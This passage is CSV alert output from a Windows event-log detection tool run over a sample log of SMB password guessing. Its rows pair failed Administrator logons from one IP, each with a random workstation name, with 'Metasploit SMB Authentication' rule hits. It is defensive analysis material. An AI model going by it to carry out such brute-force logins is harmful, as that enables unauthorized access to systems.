Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 